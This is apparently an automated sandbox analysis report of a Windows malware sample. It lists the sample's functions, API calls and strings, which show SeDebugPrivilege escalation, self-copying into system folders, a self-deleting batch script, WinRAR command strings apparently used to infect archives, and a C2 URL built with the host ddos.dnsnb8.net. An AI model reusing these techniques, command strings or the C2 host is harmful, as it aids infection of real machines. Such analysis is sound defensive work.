API String ID: 3946701194-0
Opcode ID: 7bb37be92e96dfa846122a8e8802a26ad40df9fc01a7a7eb5aa24391fa0be04d
Instruction ID: f7647c4603c68f5d0de6dd81c9db800a83a7bffaacf345d8a77fe175e3edcddf
Opcode Fuzzy Hash: 7bb37be92e96dfa846122a8e8802a26ad40df9fc01a7a7eb5aa24391fa0be04d
Instruction Fuzzy Hash: 35115EB1901314DFCB10EFA6EC8477EB7ACEB84718B16402EF912D7190D2308A41EB50

Function 00C01915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C01933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00C01947

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: d585eda395a0a0ce915ccf502baccba840bc962f5f68440df5f3ef25670b87c1
Instruction ID: 72a047f245a267aa96343a3a52522d3663a0dd33d7c27219f090fe30d59dd6b7
Opcode Fuzzy Hash: d585eda395a0a0ce915ccf502baccba840bc962f5f68440df5f3ef25670b87c1
Instruction Fuzzy Hash: 29F06236200609ABDB20DE26DC04FABB7ACAB50365F04853AF966D10D0E730E745DBB0

Function 00C06159 Relevance: 2.6, APIs: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C060DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C06189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C061A5

Memory Dump Source

Source File: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 63fcbfb7bcd846f295691ce683d2965f044bc0a847b770f9bb1a12921d6084a2
Instruction ID: b23289e85f25cd2be7b6e4e767eff3cd3b70c9eedd6b3dd18886a24c202fea21
Opcode Fuzzy Hash: 63fcbfb7bcd846f295691ce683d2965f044bc0a847b770f9bb1a12921d6084a2
Instruction Fuzzy Hash: FA116A72A006598BCF318F58CC817DE37A2EF00301F694528DE8A6B2D1DA716A60CB94

Non-executed Functions

Function 00C0119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00C013EF), ref: 00C011AB
OpenProcessToken.ADVAPI32(00000000,00000028,00C013EF,?,?,?,?,?,?,00C013EF), ref: 00C011BB
AdjustTokenPrivileges.ADVAPI32(00C013EF,00000000,?,00000010,00000000,00000000), ref: 00C011EB
CloseHandle.KERNEL32(00C013EF), ref: 00C011FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C013EF), ref: 00C01203

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C011A5

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe
API String ID: 75692138-3710522437
Opcode ID: 6d874f812aff5592c95d63fdf9ed41d3daa39583a29064f7dd7dcdbf0bbfa1a0
Instruction ID: ef62de3deddea9d176af62f08a0e0f66e9bdc9947b058785cf4f9056084ed0d5
Opcode Fuzzy Hash: 6d874f812aff5592c95d63fdf9ed41d3daa39583a29064f7dd7dcdbf0bbfa1a0
Instruction Fuzzy Hash: EB01D2B5901249EFDB00DFE4C989BAEBBBCFB04309F104469E606A2291D7759F44DB60

Function 00C0139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C013BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C013DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C01448

Part of subcall function 00C0119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00C013EF), ref: 00C011AB
Part of subcall function 00C0119F: OpenProcessToken.ADVAPI32(00000000,00000028,00C013EF,?,?,?,?,?,?,00C013EF), ref: 00C011BB
Part of subcall function 00C0119F: AdjustTokenPrivileges.ADVAPI32(00C013EF,00000000,?,00000010,00000000,00000000), ref: 00C011EB
Part of subcall function 00C0119F: CloseHandle.KERNEL32(00C013EF), ref: 00C011FA
Part of subcall function 00C0119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00C013EF), ref: 00C01203

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C013A8
SeDebugPrivilege, xrefs: 00C013D3

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe$SeDebugPrivilege
API String ID: 4123949106-3018621369
Opcode ID: 5424a6947bfb16dc25c87de507bfb5699508e4ffdc9be3e637e2383624029a8d
Instruction ID: 26703a6120e9e2ce9100e7ca1506f53f55f28d336ab2c1a916bf65baed7d73a0
Opcode Fuzzy Hash: 5424a6947bfb16dc25c87de507bfb5699508e4ffdc9be3e637e2383624029a8d
Instruction Fuzzy Hash: F6313C71D00209EAEF20DBA6CC45FEEFBB8EB84704F24416AE914B31A1D7709E45CB60

Function 00C0239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00C023CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C02464
GetFileSize.KERNEL32(00000000,00000000), ref: 00C02472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00C024A8
memset.MSVCRT ref: 00C024B9
strrchr.MSVCRT ref: 00C024C9
wsprintfA.USER32 ref: 00C024DE
strrchr.MSVCRT ref: 00C024ED
memset.MSVCRT ref: 00C024F2
memset.MSVCRT ref: 00C02505
wsprintfA.USER32 ref: 00C02524
Sleep.KERNEL32(000007D0), ref: 00C02535
Sleep.KERNEL32(000007D0), ref: 00C0255D
memset.MSVCRT ref: 00C0256E
wsprintfA.USER32 ref: 00C02585
memset.MSVCRT ref: 00C025A6
wsprintfA.USER32 ref: 00C025CA
Sleep.KERNEL32(000007D0), ref: 00C025D0
Sleep.KERNEL32(000007D0,?,?), ref: 00C025E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C025FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00C02611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00C02642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00C0265B
SetEndOfFile.KERNEL32 ref: 00C0266D
CloseHandle.KERNEL32(00000000), ref: 00C02676
RemoveDirectoryA.KERNEL32(?), ref: 00C02681

Strings

%s X -ibck "%s" "%s\", xrefs: 00C0251E
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00C025C4
%s\, xrefs: 00C0257F
C:\Users\user\AppData\Local\Temp\, xrefs: 00C023B1, 00C023B6, 00C024CD
-ibck, xrefs: 00C025BA
%s%s, xrefs: 00C024D8

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2169341206
Opcode ID: 7b6c99a1307edcbd8c5300b6a0e6e3cfbb36c8246cd2f61addb9dfebb0b252c0
Instruction ID: eeaf9578139533f5eb71334f88f9b8c55b191daf91510e6201063437ef604a18
Opcode Fuzzy Hash: 7b6c99a1307edcbd8c5300b6a0e6e3cfbb36c8246cd2f61addb9dfebb0b252c0
Instruction Fuzzy Hash: E8818FB1508344ABD7109FA0DC89FAFB7ACEB88704F00492AFA95D21D0D775DA49CB66

Function 00C0274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C02766
memset.MSVCRT ref: 00C02774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00C02787
wsprintfA.USER32 ref: 00C027AB

Part of subcall function 00C0185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01878
Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01880
Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01890
Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01894

wsprintfA.USER32 ref: 00C027C6
CopyFileA.KERNEL32(?,00C04C80,00000000), ref: 00C027D4
wsprintfA.USER32 ref: 00C027F4

Part of subcall function 00C01973: PathFileExistsA.SHLWAPI(00C04E5C,00000000,C:\Users\user\AppData\Local\Temp\TJytnf.exe), ref: 00C01992
Part of subcall function 00C01973: CreateFileA.KERNEL32(00C04E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C019BA
Part of subcall function 00C01973: Sleep.KERNEL32(00000064), ref: 00C019C6
Part of subcall function 00C01973: wsprintfA.USER32 ref: 00C019EC
Part of subcall function 00C01973: CopyFileA.KERNEL32(00C04E5C,?,00000000), ref: 00C01A00
Part of subcall function 00C01973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C01A1E
Part of subcall function 00C01973: GetFileSize.KERNEL32(00C04E5C,00000000), ref: 00C01A2C
Part of subcall function 00C01973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C01A46
Part of subcall function 00C01973: ReadFile.KERNEL32(00C04E5C,00C04E60,00000000,?,00000000), ref: 00C01A65

DeleteFileA.KERNEL32(?,?,00C04E54,00C04E58), ref: 00C0281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00C04E54,00C04E58), ref: 00C02832

Strings

\WinRAR\Rar.exe, xrefs: 00C02793
C:\Windows\system32, xrefs: 00C027E3
%s%.8x.exe, xrefs: 00C027BB
C:\Users\user\AppData\Local\Temp\, xrefs: 00C027B6
c_31892.nls, xrefs: 00C027DE
%s\%s, xrefs: 00C027EE
%s%s, xrefs: 00C027A5

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3961832207
Opcode ID: 812a3526efd665fed0cbaf24726e6f4c93ac19b001677a2590079892d67486b5
Instruction ID: 9f4c1716a7da36e926114d1e201920beade8fc03744d17a6342c4e26b36f2d57
Opcode Fuzzy Hash: 812a3526efd665fed0cbaf24726e6f4c93ac19b001677a2590079892d67486b5
Instruction Fuzzy Hash: B1214FF694025C7BEB10E7A49C89FEB776CEB04748F0105B2B754E20C2E6709F84CAA0

Function 00C01581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01878
Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01880
Part of subcall function 00C0185B: srand.MSVCRT ref: 00C01890
Part of subcall function 00C0185B: rand.MSVCRT ref: 00C01894

wsprintfA.USER32 ref: 00C015AA
wsprintfA.USER32 ref: 00C015C6
lstrlen.KERNEL32(?), ref: 00C015D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00C015EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00C01609
CloseHandle.KERNEL32(00000000), ref: 00C01612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C0162D

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C0158A, 00C015B3, 00C015B8, 00C015B9
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00C015C0
open, xrefs: 00C01627
C:\Users\user\AppData\Local\Temp\, xrefs: 00C01599
%s%.8x.bat, xrefs: 00C015A4

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\TJytnf.exe$open
API String ID: 617340118-3796865183
Opcode ID: fa6e78c1f7e8cd435c4ee4d592e9f615afadfc43fbbcd33b73924ceb6edacb59
Instruction ID: 4379fc3fcd1cbfdf134584113d5ec2e40bcc48dc285fd1442fc88b0c65a4d848
Opcode Fuzzy Hash: fa6e78c1f7e8cd435c4ee4d592e9f615afadfc43fbbcd33b73924ceb6edacb59
Instruction Fuzzy Hash: 031151B2A021687AD72097A59C89FEF7A6CEF59754F010061FA49E2080DA709B84CBB0

Function 00C0120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00C01400), ref: 00C01226
GetProcAddress.KERNEL32(00000000), ref: 00C0122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00C01400), ref: 00C0123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00C01400), ref: 00C01250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00C01400), ref: 00C0129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00C01400), ref: 00C012B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00C01400), ref: 00C012F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00C01400), ref: 00C0130A

Strings

C:\Users\user\AppData\Local\Temp\TJytnf.exe, xrefs: 00C01262
ntdll.dll, xrefs: 00C01219
ZwQuerySystemInformation, xrefs: 00C01212

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\TJytnf.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-3486291088
Opcode ID: c6fedd036cb9c8ad58cadb01d3569a1adbd860e0667f4e333b91e42cc7dc124f
Instruction ID: ad7eb013d96c8d75b6280ca9c0b6065d0b2c07e29a7b6c274fb328db3b197d63
Opcode Fuzzy Hash: c6fedd036cb9c8ad58cadb01d3569a1adbd860e0667f4e333b91e42cc7dc124f
Instruction Fuzzy Hash: E121DD71706391ABD7209B65CC08B6FFAACFB89B14F090928FA55E62D0C770DB44C7A5

Function 00C0185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00C01118), ref: 00C01867
srand.MSVCRT ref: 00C01878
rand.MSVCRT ref: 00C01880
srand.MSVCRT ref: 00C01890
rand.MSVCRT ref: 00C01894

Strings

http://%s:%d/%s/%s, xrefs: 00C01860
ddos.dnsnb8.net, xrefs: 00C01862

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: 17f7b5ff9376be771718e5c33fd2105cb4b29dea74226c5edc8eb82a55c059a2
Instruction ID: 0dbb97a21be1b774b0334212c49d7419574a7835e277927544e90f102622fd1e
Opcode Fuzzy Hash: 17f7b5ff9376be771718e5c33fd2105cb4b29dea74226c5edc8eb82a55c059a2
Instruction Fuzzy Hash: CDE0D877A0022CBFE700A7F9EC46A9EBBACDE84165B110527F600D3250E970FD44CAB4

Function 00C02692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,00C029DB,?,00000001), ref: 00C026A7
WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,00C029DB,?,00000001), ref: 00C026B5
lstrlen.KERNEL32(?), ref: 00C026C4
??2@YAPAXI@Z.MSVCRT ref: 00C026CE
lstrcpy.KERNEL32(00000004,?), ref: 00C026E3
lstrcpy.KERNEL32(?,00000004), ref: 00C0271F
??3@YAXPAX@Z.MSVCRT ref: 00C0272D
SetEvent.KERNEL32 ref: 00C0273C

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 6b6e650fdd7e7b6f7ffba6857ebeb59ddb43fc19d763cc15dfe523adb6304c20
Instruction ID: 19216a5eb4f0442027187bc5266590de7b1584c564cd205edc6fd1249f436550
Opcode Fuzzy Hash: 6b6e650fdd7e7b6f7ffba6857ebeb59ddb43fc19d763cc15dfe523adb6304c20
Instruction Fuzzy Hash: CA119DB6501210EFCB219F19EC4CB5FBBADFB84B207124016F968871A0D7708A85DB50

Function 00C01B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00C01BCD
rand.MSVCRT ref: 00C01BD8
memset.MSVCRT ref: 00C01C43
memcpy.MSVCRT ref: 00C01C4F
lstrcat.KERNEL32(?,.exe), ref: 00C01C5D

Strings

.exe, xrefs: 00C01C57
ifuIwLhQukfdnSndMjHyxORRmsDeLmvpFZlGCBPEjcGWLwGDFKYgxbRMdtJifkzIWTgnaCgKvlBcorymOyTYVAINbwzrcpDAEzuVtSqqqNJQXUhJvAXosijheBoYsMbaQUSHWXEZtPPeKTrOUkHNpVlaFZxC, xrefs: 00C01B8A, 00C01B9C, 00C01C15, 00C01C49

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$ifuIwLhQukfdnSndMjHyxORRmsDeLmvpFZlGCBPEjcGWLwGDFKYgxbRMdtJifkzIWTgnaCgKvlBcorymOyTYVAINbwzrcpDAEzuVtSqqqNJQXUhJvAXosijheBoYsMbaQUSHWXEZtPPeKTrOUkHNpVlaFZxC
API String ID: 122620767-470473977
Opcode ID: 0f86209f2479c0d4099223d990b8ff54e9053779ba8980bc6cdfb4ef88c6539a
Instruction ID: b5c7d9b1031364d91b0f780325562def98087c16d67370e0a1135d0281e4317a
Opcode Fuzzy Hash: 0f86209f2479c0d4099223d990b8ff54e9053779ba8980bc6cdfb4ef88c6539a
Instruction Fuzzy Hash: FD213EB2E452A06EE3192335EC40B6EBB449FE3B11F1B4099FE951B1D2D2640695D264

Function 00C0189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C018B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 00C018D3
CloseHandle.KERNEL32(00C02549), ref: 00C018E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C018F0
GetExitCodeProcess.KERNEL32(?,00C02549), ref: 00C01901
CloseHandle.KERNEL32(?), ref: 00C0190A

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 7f004dcb8346c247314daaf83852298f4581847b9a6b8435274d565bc6bd3784
Instruction ID: 50822f393c5f5373f2ab0a08b09c65c7304c32bf39685b57989136272c3a4a43
Opcode Fuzzy Hash: 7f004dcb8346c247314daaf83852298f4581847b9a6b8435274d565bc6bd3784
Instruction Fuzzy Hash: CC017C72901168BFDB21ABD6DC48EDFBF3DEF85724F104121FA15A51A0D6314A18CAA0

Function 00C01319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00C01334
GetProcAddress.KERNEL32(00000000), ref: 00C0133B
memset.MSVCRT ref: 00C01359

Strings

ntdll.dll, xrefs: 00C0132F
NtSystemDebugControl, xrefs: 00C0132A

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 99f4095b99aa91923f4d3d6b1feadb99c11e8d9439f0d8416d153c10429f023b
Instruction ID: adb0e93cb25ed0b76cb2685bccd2a02305140bbb4b7d5e322ab8739dc8392786
Opcode Fuzzy Hash: 99f4095b99aa91923f4d3d6b1feadb99c11e8d9439f0d8416d153c10429f023b
Instruction Fuzzy Hash: 5D016971A01309AFDB10DFA9AC89AAFBBACFB45314F04413AF951A21A0E2709A05CA51

Function 00C01DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

